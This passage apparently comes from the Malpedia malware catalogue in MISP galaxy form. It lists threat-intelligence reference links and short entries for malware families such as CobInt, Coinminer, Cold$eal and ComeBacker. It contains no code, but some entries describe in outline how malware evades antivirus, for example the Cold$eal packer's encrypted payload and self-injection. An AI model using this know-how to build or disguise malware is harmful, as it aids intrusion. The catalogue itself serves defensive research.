https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack
https://www.secureworks.com/research/threat-profiles/bronze-riverside
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
https://www.brighttalk.com/webcast/7451/462719
https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://blog.group-ib.com/REvil_RaaS
https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718
https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/
https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/
https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/
https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/
https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730
https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728
https://www.macnica.net/file/mpression_automobile.pdf
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf
https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/
https://www.hhs.gov/sites/default/files/bazarloader.pdf
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a
https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/
https://asec.ahnlab.com/ko/19860/
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021
https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64
https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv
https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/
https://us-cert.cisa.gov/ncas/alerts/aa21-148a
https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader
https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/
https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—a-ransomware—and-a-botnet-join-the-part.html
https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811
https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153
https://connormcgarr.github.io/thread-hijacking/
https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/
https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups
https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41
https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/
https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5
https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/
https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf
https://isc.sans.edu/diary/rss/27176
https://community.riskiq.com/article/c88cf7e6
https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf
https://community.riskiq.com/article/f0320980
https://www.youtube.com/watch?v=ysN-MqyIN7M
https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon
https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/
https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html
https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot
https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html
https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf
https://twitter.com/GossiTheDog/status/1438500100238577670
https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware
https://www.secureworks.com/research/threat-profiles/tin-woodlawn
https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/
https://twitter.com/VK_Intel/status/1294320579311435776
https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/
https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/
https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f
https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929
https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9
https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt
https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/
https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/
https://www.youtube.com/watch?v=gfYswA_Ronw
https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A
https://blog.cobaltstrike.com/
https://twitter.com/RedDrip7/status/1402640362972147717?s=20
https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware
https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack
https://www.secureworks.com/research/threat-profiles/gold-waterfall
https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b
https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/
https://www.youtube.com/watch?v=LA-XE5Jy2kU
https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
https://thedfirreport.com/2020/10/08/ryuks-return/
https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf
https://twitter.com/swisscom_csirt/status/1354052879158571008
https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/
https://us-cert.cisa.gov/ncas/alerts/aa21-265a
https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf
https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728
https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html
https://web.br.de/interaktiv/ocean-lotus/en/
https://twitter.com/alex_lanstein/status/1399829754887524354
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia
https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/
https://us-cert.cisa.gov/ncas/alerts/aa20-275a
https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/
https://www.accenture.com/us-en/blogs/security/ransomware-hades
https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/
https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20
https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e
https://blog.macnica.net/blog/2020/11/dtrack.html
https://blog.group-ib.com/colunmtk_apt41
https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear
https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon
https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/
https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/
https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ
https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day—cve-2021-40444—hits-windows—tr.html
https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/
http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems
https://401trg.com/burning-umbrella/ [https://401trg.com/burning-umbrella/ ]
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md
https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware
https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf
https://www.youtube.com/watch?v=6SDdUVejR2w
https://www.youtube.com/watch?v=y65hmcLIWDY
https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/
https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/
https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/
https://www.malware-traffic-analysis.net/2021/09/17/index.html
https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811
https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/
https://isc.sans.edu/diary/rss/26862
https://twitter.com/elisalem9/status/1398566939656601606
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a
https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/
https://mez0.cc/posts/cobaltstrike-powershell-exec/
https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations
https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/
https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach
https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/
https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html
https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf
https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/
https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a
https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/
https://twitter.com/redcanary/status/1334224861628039169
https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html
https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware
https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734
https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html
https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html
https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/
https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/
https://isc.sans.edu/diary/27308
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e
https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/
https://paper.seebug.org/1301/
https://netresec.com/?b=214d7ff
https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e
https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
https://www.youtube.com/watch?v=borfuQGrB8g
https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.lac.co.jp/lacwatch/people/20180521_001638.html
https://www.istrosec.com/blog/apt-sk-cobalt/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos
https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/
https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/
https://twitter.com/ffforward/status/1324281530026524672
https://community.riskiq.com/article/0bcefe76
https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/
https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos
https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf
https://securelist.com/apt-trends-report-q2-2020/97937/
https://www.trendmicro.com/en_us/research/20/i/u-s—justice-department-charges-apt41-hackers-over-global-cyberattacks.html
https://isc.sans.edu/diary/26752
https://twitter.com/TheDFIRReport/status/1356729371931860992
https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/
https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html
https://twitter.com/Cryptolaemus1/status/1407135648528711680
https://twitter.com/AltShiftPrtScn/status/1350755169965924352
https://redcanary.com/blog/grief-ransomware/
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/
https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts
https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors
https://www.youtube.com/watch?v=GfbxHy6xnbA
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf
https://malwarelab.eu/posts/fin6-cobalt-strike/
https://www.secureworks.com/research/threat-profiles/gold-kingswood
https://twitter.com/AltShiftPrtScn/status/1403707430765273095
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/
https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/
https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf
https://skyblue.team/posts/scanning-virustotal-firehose/
https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf
https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/
https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://redcanary.com/blog/getsystem-offsec/
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/
https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a
https://zero.bs/cobaltstrike-beacons-analyzed.html
https://github.com/Apr4h/CobaltStrikeScan
https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/
https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/
https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/
https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/
https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://www.arashparsa.com/hook-heaps-and-live-free/
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html
https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/
https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor
https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/
https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/
https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
https://isc.sans.edu/diary/rss/27618
https://www.youtube.com/watch?v=WW0_TgWT2gs
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates
https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/
https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#
https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/
https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf
https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/
https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/
http://www.secureworks.com/research/threat-profiles/gold-kingswood
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618
http://www.secureworks.com/research/threat-profiles/gold-winter
https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/
https://thedfirreport.com/2021/05/12/conti-ransomware/
https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e
https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/
https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists
https://www.secureworks.com/research/threat-profiles/bronze-mohawk
https://twitter.com/TheDFIRReport/status/1359669513520873473
https://asec.ahnlab.com/ko/19640/
https://www.cobaltstrike.com/support
https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html
https://awakesecurity.com/blog/catching-the-white-stork-in-flight/

Cobian RAT

The tag is: misp-galaxy:malpedia="Cobian RAT"

Cobian RAT is also known as:

Table 1593. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat
https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html
https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/
https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

CobInt

CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager. It’s CRM mailslot module was also observed being downloaded by ISFB.

The tag is: misp-galaxy:malpedia="CobInt"

CobInt is also known as:

COOLPANTS

Table 1594. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint
https://www.group-ib.com/blog/renaissance
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
http://www.secureworks.com/research/threat-profiles/gold-kingswood
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint
https://www.netscout.com/blog/asert/double-infection-double-fun
https://asert.arbornetworks.com/double-the-infection-double-the-fun/
https://www.secureworks.com/research/threat-profiles/gold-kingswood

Cobra Carbon System

The tag is: misp-galaxy:malpedia="Cobra Carbon System"

Cobra Carbon System is also known as:

Carbon

Table 1595. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra
https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf
https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://securelist.com/shedding-skin-turlas-fresh-faces/88069/
https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
https://github.com/hfiref0x/TDL
https://www.circl.lu/pub/tr-25/
https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon
https://www.youtube.com/watch?v=FttiysUZmDw
https://securelist.com/analysis/publications/65545/the-epic-turla-operation/
https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf

CockBlocker

The tag is: misp-galaxy:malpedia="CockBlocker"

CockBlocker is also known as:

Table 1596. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker
https://twitter.com/JaromirHorejsi/status/817311664391524352

CodeKey

The tag is: misp-galaxy:malpedia="CodeKey"

CodeKey is also known as:

Table 1597. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey
https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf

Cohhoc

The tag is: misp-galaxy:malpedia="Cohhoc"

Cohhoc is also known as:

Table 1598. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc
https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf

Coinminer

Coinminer is an unwanted malicious software which uses the victim’s computational power (CPU and RAM mostly) to mine for coins (for example Monero or Zcash). The malware achieves persistence by adding one of the opensource miners on startup without the victim’s consensus. Most sophisticated coin miners use timer settings or cap the CPU usage in order to remain stealthy.

The tag is: misp-galaxy:malpedia="Coinminer"

Coinminer is also known as:

Table 1599. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer
https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/
https://secrary.com/ReversingMalware/CoinMiner/
https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/

ColdLock

The tag is: misp-galaxy:malpedia="ColdLock"

ColdLock is also known as:

Table 1600. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock
https://www.trendmicro.com/en_us/research/20/i/u-s—justice-department-charges-apt41-hackers-over-global-cyberattacks.html
https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5

Cold$eal

Cold$eal is a packer for encrypting (sealing) malware. It contains some AV-evasion techniques as well as some sandbox-detection. It was developed by $@dok (aka Sadok aka Coldseal). It was available as a cryptor service under the url coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom made cryptostub including a FuD garantee backed by free update to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. Upon start the cryptostub would extract the key, decrypt the payload and perform a selfinjection using the now decrypted payload. Note: The packed sample provided contains some harmless payload, while the unpacked sample is the bare cryptostub without a payload.

The tag is: misp-galaxy:malpedia="Cold$eal"

Cold$eal is also known as:

ColdSeal

Table 1601. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal
https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html
https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/
https://www.youtube.com/watch?v=242Tn0IL2jE
http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/
https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html

CollectorGoomba

The tag is: misp-galaxy:malpedia="CollectorGoomba"

CollectorGoomba is also known as:

Table 1602. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba
https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/

Colony

The tag is: misp-galaxy:malpedia="Colony"

Colony is also known as:

Bandios
GrayBird

Table 1603. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.colony
https://twitter.com/anyrun_app/status/976385355384590337
https://secrary.com/ReversingMalware/Colony_Bandios/
https://pastebin.com/GtjBXDmz

Combojack

The tag is: misp-galaxy:malpedia="Combojack"

Combojack is also known as:

Table 1604. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack
https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/

Combos

The tag is: misp-galaxy:malpedia="Combos"

Combos is also known as:

Table 1605. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.combos
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

ComeBacker

This malware was found in a backdoored Visual Studio project that was used to target security researchers.

The tag is: misp-galaxy:malpedia="ComeBacker"

ComeBacker is also known as:

Table 1606. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker
https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/
https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/
https://www.anquanke.com/post/id/230161
https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/
https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/

Comfoo

The tag is: misp-galaxy:malpedia="Comfoo"

Comfoo is also known as:

Table 1607. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.comfoo
https://www.secureworks.com/research/secrets-of-the-comfoo-masters

ComodoSec

The tag is: misp-galaxy:malpedia="ComodoSec"

ComodoSec is also known as:

Table 1608. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec
https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

COMpfun

The tag is: misp-galaxy:malpedia="COMpfun"

COMpfun is also known as:

Reductor RAT

Table 1609. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun
https://securelist.com/compfun-successor-reductor/93633/
https://securelist.com/compfun-http-status-based-trojan/96874/
